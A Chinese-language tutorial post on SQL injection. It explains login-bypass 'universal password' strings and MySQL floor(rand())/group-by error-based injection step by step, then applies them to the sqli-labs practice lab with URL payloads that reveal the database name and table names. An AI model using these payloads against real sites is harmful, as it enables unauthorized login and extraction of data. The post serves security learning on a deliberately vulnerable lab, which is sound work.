★SQL注入漏洞（3）(5) 万能密码和报错注入法-CFANZ编程社区

'or'1'='1'#
'or'1'='1'--+

第一个单引号和等号右边自带的一个引号闭合了，然后用or形成永正有可能会把数据库的所有内容都回显出来

然后注释符号把右边自带的引号也注释掉了一般登录成功的账号也是数据库的第一个账号

万能密码是一种比较低级的漏洞，有概率通过输入这种的万能语句从而登录成功！

------------------------

报错注入未必要and or也是可以执行报错函数注入的

知识储备：

select * from table1;
select count(*) from table1;  //计算一下选取出来的结果的数量
select rand();    //rand 可以生成一个随机数（0-1）
select rand()*2;  //个位要么是0 要么是1
select floor(1.56);   //向下取整 四舍五不入
select floor(rand()*2);   //取一个随机0-1的整数 即0或者1
select floor(rand()*2)a;   //给前面的语句取一个别名叫a 这样显示的时候第一行就不会那么冗杂了
select * from table1 group by id;  //将内容以id列进行分组输出
select concat(1,2,3);  //将几个逗号间的内容拼接起来

select concat(1,2,3);  //字符拼接 123
select password,count(*) as num from table1 group by password; //统计不同密码有多少个 统计数据命名为num 顺便按照password分组
0x3a  //是十六进制冒号"："的意思
select concat(0x3a,0x3a,"haha");  // ::haha
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;   // ::库名::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;   //库名后面再加一个随机数

select 'haha' from table1;   //会显示n个haha  数据库有n个内容就有n个haha
select floor(rand()*2)a from table1;  //会出现n个随机的0或者1
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;  
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
//如果不用别名 原始句子是:
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

Mysql的rand函数有漏洞 rand函数每次出现都会重新计算一次

select count(*) from table1;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

select count(*) from information_schema.columns;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,1);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,0);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

//先令其产生随机数然后用count去计算随机数还要用a对其进行分组排列

//如果前面0和1都出现了，那么排列0或者1都可以如果前面随机数都是出现0 而我们要让其以1来排序就会出错。

//group by a 可以把a替换为前面的concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) 是等价的

//前后不同的时候排序就会报错

//本质 group by a是按照a排序，a里面只有0，1 且随机。但是总会存在两个0，两个1的情况

在mysql官方解释里，rand函数每次出现都会重新计算一次，所以a这个别名的内容和前面的结果是未必相同的

报错注入的适用情况：如果输入正确会查数据库但是不显示东西，输入错误就会报错

例题：sqli-labs T5 T6 （是有运气成功的不断尝试即可因为随机的问题）

方法1：floor() 函数

?id=2' --+ //可以判断出闭合

?id=-2' union select 1,2,3 --+ //没有报错位

//暴露数据库的库名

?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

//暴露数据库的表名

?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+